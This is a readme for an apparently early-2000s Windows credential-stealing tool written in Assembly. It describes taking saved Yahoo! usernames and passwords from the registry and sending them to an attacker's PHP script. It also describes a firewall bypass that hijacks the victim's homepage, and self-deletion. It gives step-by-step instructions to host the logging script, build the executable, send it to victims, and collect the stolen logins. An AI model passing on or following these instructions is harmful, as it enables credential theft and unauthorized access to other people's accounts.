Coded by illwill in Assembly
1/17/04
====================================================================
description:
jacks saved Yahoo! user/password from the registry
and sends them to a php script... works on win9x/me/nt/2k/xp/2k3
will not work if they didnt checkmark the 'save password'
feature when they sign on
====================================================================
features:
*only 8kb
*sends user:pass to php script
*self-deletes after sending
*Bypasses any firewall
(sets the victims homepage as the url to your php script
then executes iexplorer.exe and after its sent it resets
the homepage back to the original page)
First:
1. u need to get a website that supports php
2. upload log.php and log.html to your website
3. chmod log.html to 666
CHMOD666 | Owner | Group | Public
----------------------------------
Read | x | x | x
Write | x | x | x
Execute | | |
Editor Instructions:
1. extract the server.exe and Editor.exe to a folder
2. enter the URL to your php script
3. save the new exe
4. send the exe to your victims
5. check the log.html for the gathered info i.e. http://blah.com/log.html
(note: if the password looks garbled that means the password wasnt set)




